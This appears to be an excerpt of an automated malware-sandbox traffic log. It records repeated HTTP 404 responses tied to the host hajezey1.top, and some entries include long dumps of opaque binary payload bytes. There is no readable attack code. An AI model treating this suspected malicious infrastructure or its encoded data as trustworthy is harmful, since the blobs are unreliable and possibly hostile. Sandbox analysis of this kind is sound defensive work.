Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 52 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b c3 a7 86 38 b4 f2 a7 7c 2d f0 3a cb 8f 8c f5 cf 9b 2b 25 9b 16 ba eb 1b bb 1d 57 74 d2 eb 98 87 cd 23 80 78 51 a1 a2 8f d2 ee df 1c e0 12 02 50 08 08 d8 e2 30 a5 19 93 9b 97 4f f3 e0 e4 62 79 00 54 ea d6 d7 0c 3d 61 19 27 f4 d2 af 34 91 b4 b9 c1 82 20 59 57 11 5c 7c 3b 66 ab 4b 11 c0 4d 58 4b 77 13 d2 08 5b 47 86 65 29 15 32 39 c5 f7 45 22 aa cf 7c c1 7f 9f fc b7 a8 9f 96 98 8b 36 19 19 cb 8a f3 d8 05 0f 4e 86 19 7d 6f ab e1 04 89 63 7a 55 80 90 70 89 7f c8 4a 6b b6 e2 a2 22 48 42 d3 49 ad ff fc ff 1f ed f5 3f f4 6d d3 7c ce 36 d3 ce 4e 49 b3 0b 5e 4c 64 55 5b ad 30 7a 83 9b 84 c8 c3 e7 b2 ec 1c e1 0c 1c 55 ee 87 fe 0c 35 9a 3d 50 6f d0 56 81 96 8b 97 9e 60 9f 8a 86 e8 47 5a bd b2 cb 99 64 51 11 87 4a b1 b8 56 ec ef f7 0a 83 8b 71 91 e0 75 7e 64 19 a0 77 79 27 24 58 96 da 39 d1 3a 2d a6 43 06 02 27 47 c2 fa 6b 8a b2 e2 4b 6d ec 00 31 a5 e2 ec d7 d9 e6 60 f7 f8 23 d3 3e 5b f3 71 81 4a 04 38 2d 7f 14 2c d6 e8 b1 14 73 71 10 fa 82 4b 86 07 30 5a 22 a2 3f 0b 8e 2b 51 fd f5 7a 00 9d 82 ef d0 d6 4a 13 a7 e9 4d 51 c2 41 64 cd 27 5c 8d b7 a3 23 0c 26 17 51 d2 eb e9 23 19 b3 32 59 08 42 41 ae e4 36 dd 3f 9d 43 cd 17 fe 2f 15 9f f8 d8 66 47 42 25 e1 b5 be 34 56 9b 46 3e 99 86 11 22 83 37 22 ec 68 aa cf 04 2a 95 36 56 0f 50 67 74 20 b9 87 f6 f4 81 de bb 34 6b 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ac f8 b9 1f 3a 48 93 92 4e bd 44 ef fb c9 e3 de ea 50 38 02 97 b1 a4 
57 25 57 b9 d0 ea 85 62 4a 08 7d 54 7a 98 6c 39 c0 1e f3 5c d9 40 00 fc ce 6e 47 b3 9a 4c 07 22 7d e6 a2 c6 62 b9 14 31 eb cd 40 24 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 3b 88 4b 6e 47 f3 04 dd be c6 83 41 5f 4f af b8 e8 01 be a2 57 ee 60 87 bd b7 6b 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 12 d3 e4 de 0e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 bd 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 95 09 09 a8 1f 13 30 7b 32 cc c9 e1 ad c3 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 98 3f d8 2c eb 53 43 a0 0c 97 e4 22 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:45 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c 7f e2 46 aa 8f 8c f5 cf 9b 2b 25 9b f6 ba c9 1b b0 1c 67 74 d2 ff 95 87 cd 2b 80 78 51 a1 a2 8f 2c df d2 1c e0 32 02 50 08 08 d8 e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1f 27 f4 d2 af 34 91 b4 b9 41 8f 20 59 55 11 5c 7c 3b 66 ab 49 11 a0 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 bd 28 c6 8a 44 d8 06 0e 45 c7 1e 7d 6f fb e0 04 89 f9 d4 57 80 90 70 89 ec e4 4a 6b b6 f2 a2 22 48 52 df 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 23 36 55 96 da 19 d1 3a 2d b2 4e 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 71 87 4a 04 38 6d 72 14 2c d0 e8 b1 14 65 7c 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 a2 4c 64 cd 25 5c 8d b7 bf 2e 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 c5 d0 b8 be 34 56 9b 46 76 99 86 11 00 83 32 42 52 f7 c2 ae 64 0f 95 36 e1 48 52 67 25 50 b8 81 f6 bc 81 de bb 6e 6a 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 25 f5 b8 d0 bc a6 62 4a 08 5d f6 b3 06 2d 1a c0 5e f3 7c bb a7 fd d4 98 21 17 da 9a 2d 35 23 7d f5 b2 68 60 b8 10 31 fa ed ad 67 e1 e1 bd 84 f3 8c 40 b6 f0 90 4f a1 21 71 ae 61 2e 7a b1 76 af ce c6 83 41 66 30 ae a9 c8 d0 7e 33 3a 64 67 0b bf 77 6a 66 21 0e 8a ef 28 1d 41 81 d4 b6 78 8e 18 d3 e4 9e 0c 7b d6 6c 02 2f 27 76 d7 9b 4e 20 ba f5 be 08 85 fd 89 aa 41 b7 28 8f f4 d5 06 78 5c 9b b8 08 c0 e5 5c c5 17 00 f3 b8 d0 a3 39 a9 b2 13 20 1d 06 1a 1b e1 ea f0 6c 8d e9 c7 d2 83 6f d5 c5 3b ec cf 8b 40 75 02 99 e0 03 f4 c3 05 cb 99 d3 23 2a 71 c7 a5 d9 62 77 ca 08 8f bd c8 11 61 a1 99 9e 5f e3 0f 4e 8a d0 23 9d 43 8e 7e 14 0e b9 2c 58 99 f7 6d 08 d8 fd f7 cb ab 42 66 fb 05 6d 77 5e 8e b7 4a 84 99 fb 42 17 7d bd 91 94 13 85 f3 bd b3 3b 1c 67 c7 22 e7 19 8e 53 c0 b2 21 ab 63 95 22 89 ac 1f 13 34 5e 12 59 b3 52 34 eb e0 0f 25 b8 a3 c1 1d d7 cb ab 14 62 f3 3b 1f 70 da be 91 b3 bf de 2c eb 57 66 80 fe 9d 11 b0 5e fe 14 f9 20 e4 89 93 64 4b 70 94 ea 13 6b e6 e8 80 0b 3d f2 9d 65 09 de fb 18 e1 98 ea 30 e3 dc dd 6a db 82 96 dd
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c 1d 16 4d aa 8f 8c f5 cf 9b 2b 25 9b f6 ba e9 1a b0 1c 07 74 d2 87 9a 87 cd 2b 80 78 51 a1 a2 8f 3c 65 dd 1c e0 32 02 50 08 a8 da e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1d 27 f4 d2 af 34 91 b4 b9 21 80 20 59 55 11 5c 92 86 64 ab 49 11 80 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 85 92 c9 8a 5c d8 06 0e 45 27 11 7d 87 f8 e0 04 89 f9 d4 57 80 90 70 89 ec 9c 48 6b 0e e1 a2 22 48 f2 d0 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 d3 4f 5a 96 da 19 d1 3a 2d ca 41 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 99 84 4a 04 38 8d 7d 14 2c d0 e8 b1 14 1d 73 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 02 43 64 cd 25 5c 8d b7 d7 21 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 f5 6a b7 be 34 56 9b 46 76 99 86 11 00 83 32 42 ea 6f cf ae 04 5d 94 36 e1 48 50 67 35 50 b8 81 be f0 80 de 5b 46 6a 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 25 f5 b8 d0 a7 85 62 4a 52 7d 54 7a 08 6c 39 c0 5e f3 5c 19 6d 63 95 be 07 3d da 9a 3e 05 22 7d e6 b2 68 60 bd 10 31 eb cd fc 25 15 8e b7 82 7f 8e 40 b6 f1 47 4e a1 21 84 88 4b 2e 69 81 77 af dd c6 83 41 df 30 ae b8 e8 21 10 a0 57 6e 61 87 bd 77 6a 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 52 d3 e4 9e 4e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 3d 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 9b 09 09 a8 00 13 30 7b 88 cc c9 e1 a3 c3 e5 0f 25 93 23 c4 a9 d7 cf 8e 3d 39 dc 46 ba 58 dc be b0 98 3f d8 94 eb 53 43 a1 0c 97 e4 6e 76 f9 14 34 0b 64 82 b2 64 4f 55 e0 ca 5e c3 bd c0 88 0b 54 d9 1d 69 7a de ff 3d e1 03 70 2e 1f f4 d4 6a a9 a9 16 da
